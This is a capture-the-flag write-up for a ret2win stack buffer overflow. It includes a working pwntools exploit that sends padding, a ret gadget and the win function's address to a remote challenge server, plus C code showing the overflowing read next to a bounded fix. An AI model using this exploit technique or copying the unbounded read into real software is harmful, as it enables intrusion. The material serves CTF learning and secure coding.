# Free flag

> Simple ret2win exploit.

The binary calls `read` into a buffer at `rbp-0x20`, reading 0x38 bytes.

That is 0x18 bytes past the end of the buffer: the 8 bytes of saved RBP plus 16 bytes after RBP, enough for the return address and one more qword.

We simply send 0x28 junk bytes, the address of a `ret` gadget, and the address of `win_win` (`win_win` is a function that runs `cat flag.txt`; the `ret` gadget is only there for stack alignment).

For some reason I had to put an interactive session in right after connecting to the server and hit Ctrl-C so that the exploit continued, in order for it to work...

```python
from pwn import *

e = ELF("./chall")

# 0x20-byte buffer at rbp-0x20 plus 8 bytes of saved rbp: 0x28 bytes to the return address
NUM_TO_RET = 0x20 + 8
padding = b'A' * NUM_TO_RET

# single `ret` gadget, used only to keep the stack 16-byte aligned before win_win
retgadget = 0x00000000004005ae  # ret

# padding + ret gadget + address of win_win (which runs `cat flag.txt`)
payload = padding + p64(retgadget) + p64(e.symbols['win_win'])

# p = e.process()  # local run
p = remote('europe.pwn.zh3r0.ml', 3456)
p.interactive()   # hit Ctrl-C here so the script continues (see note above)
p.sendline(payload)
p.interactive()
```
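As an added illustration (not the challenge's source, which the writeup does not include), here is the assumed shape of the vulnerable function next to a bounded version, with helpers that check why a 0x38-byte read into a 0x20-byte buffer reaches the return address and why 0x28 bytes of padding are needed:

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed layout, reconstructed from the writeup: a 0x20-byte buffer at
 * rbp-0x20 and a read() of 0x38 bytes. */
#define BUF_SIZE  0x20
#define READ_LEN  0x38
#define SAVED_RBP 8      /* bytes between the buffer end and the return address */

/* Vulnerable shape: the read is bounded by a constant, not by the buffer.
 * Not called below: feeding it 0x38 bytes smashes the stack. */
ssize_t vuln_read(int fd) {
    char buf[BUF_SIZE];
    return read(fd, buf, READ_LEN);        /* writes up to 0x18 bytes past buf */
}

/* Hardened shape: the bound is derived from the buffer, with room for a NUL. */
ssize_t safe_read(int fd) {
    char buf[BUF_SIZE];
    ssize_t n = read(fd, buf, sizeof buf - 1);
    if (n < 0) return n;
    buf[n] = '\0';
    return n;
}

/* How many bytes past the buffer a read of read_len bytes can write. */
size_t overflow_bytes(size_t buf_size, size_t read_len) {
    return read_len > buf_size ? read_len - buf_size : 0;
}

/* Bytes to reach the saved return address: this is the writeup's 0x28. */
size_t padding_to_return(size_t buf_size) { return buf_size + SAVED_RBP; }

/* The return address is overwritten only if the overflow covers saved rbp
 * and the 8-byte return slot. */
int return_address_reachable(size_t buf_size, size_t read_len) {
    return overflow_bytes(buf_size, read_len) >= SAVED_RBP + 8;
}

/* Feeds nbytes of 'A' (constructed input) through a pipe to safe_read and
 * returns how many bytes it accepted. */
ssize_t demo_safe_read(size_t nbytes) {
    int fds[2];
    if (pipe(fds) != 0) return -1;
    char *junk = malloc(nbytes);
    memset(junk, 'A', nbytes);
    if (write(fds[1], junk, nbytes) != (ssize_t)nbytes) return -1;
    close(fds[1]);
    ssize_t n = safe_read(fds[0]);
    close(fds[0]);
    free(junk);
    return n;
}
```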

